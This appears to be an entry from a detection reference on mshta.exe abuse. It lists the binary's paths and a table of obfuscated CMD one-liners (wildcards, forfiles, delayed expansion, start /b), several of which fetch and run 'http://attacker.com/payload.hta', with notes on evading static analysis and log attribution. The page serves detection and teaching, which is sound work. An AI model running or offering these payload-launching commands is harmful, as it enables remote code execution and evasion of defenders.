mshta

Windows CMD execution T1218.005

Microsoft HTML Application host. Executes HTA files or inline VBScript/JScript — commonly used for payload execution and initial access.

Binary Paths

C:\Windows\System32\mshta.exe
C:\Windows\SysWOW64\mshta.exe

Glob Patterns

Pattern	Notes
`for /f %i in ('where mshta*') do %i http://attacker.com/payload.hta`	Star matches '.exe'
`for /f %i in ('where m*ta.exe') do %i`	Star replaces 'sh'
`for /f %i in ('where ms?ta.exe') do %i`	Single char wildcard replaces 'h'
`for /f %i in ('dir /b C:\Windows\System32\ms*ta.exe') do %i`	dir glob search
`for %i in (C:\Windows\System32\ms?ta.exe) do @%i http://attacker.com/payload.hta`	Native CMD for loop with filesystem glob — ms?ta uniquely matches mshta.exe in System32
`for /f %i in ('where /r C:\Windows ms?ta.exe') do %i http://attacker.com/payload.hta`	Recursive where search across Windows tree — finds mshta.exe in System32 and SysWOW64
`forfiles /p C:\Windows\System32 /m ms?ta.exe /c "@file http://attacker.com/payload.hta"`	forfiles ? mask finds mshta.exe — @file expands to matched filename for execution
`cmd /v:on /c "set x=mshta& !x! http://attacker.com/payload.hta"`	Delayed variable expansion — /v:on enables !var! syntax; !x! resolves at runtime, evading parse-time static analysis
`cmd /c for /f %i in ('where m*ta.exe') do %i http://attacker.com/payload.hta`	cmd /c wrapper adds an extra process layer — glob still resolves via where; parent process becomes cmd.exe not the caller
`for /f %i in ('where mshta*') do start "" /b %i http://attacker.com/payload.hta`	start /b launches mshta.exe as a detached background process — changes parent process attribution in event logs

Pattern Tester

Try typing mshta or a full path like C:\Windows\System32\mshta.exe

YARA Rule

Auto-generated detection rule for mshta

Platform Notes